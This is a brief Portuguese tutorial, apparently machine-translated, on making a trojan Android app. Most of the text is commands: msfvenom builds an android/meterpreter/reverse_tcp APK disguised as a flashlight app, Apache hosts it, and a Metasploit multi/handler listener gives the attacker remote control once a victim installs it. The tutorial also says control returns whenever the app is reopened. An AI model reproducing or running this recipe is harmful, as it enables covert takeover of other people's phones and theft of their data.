A primeira coisa a fazer é criar um APK maliciosos agente / bot. Este software deve ser instalado no dispositivo Android para controlar. Por exemplo, eu realizar estes testes em um ambiente local:
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk
Em seguida, a fim de facilitar o carregamento do APK no telefone, eu
vou construir um Apache2 (em Kali 2), e irá copiar o APK para a pasta
raiz do servidor web:
service apache2 start
cp /root/linterna.apk /var/www/html
O próximo passo será iniciar msfconsole, carregar a explorar e carga útil reverse_tcp Android:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Em seguida, configurar o endereço IP onde deixamos a escuta manipulador de porta e nós já indicou que o bot deve ser conectado:
set LHOST 192.168.1.50
set LPORT 4444
Finalmente, executar a instrução explorar:
exploit
Agora, se você instalar o software que você já sediou na rota http://192.168.1.50/linterna.apk teremos controle sobre o dispositivo.
Temos uma grande lista de comandos para interagir com o dispositivo:
Se você realizar muitos testes com ele, você vai ver que não é 100%
estável, e quando trazemos grandes quantidades de informação geralmente
pendurar o dispositivo. Mas só temos de reabrir o APK instalado para assumir o controle novamente no terminal.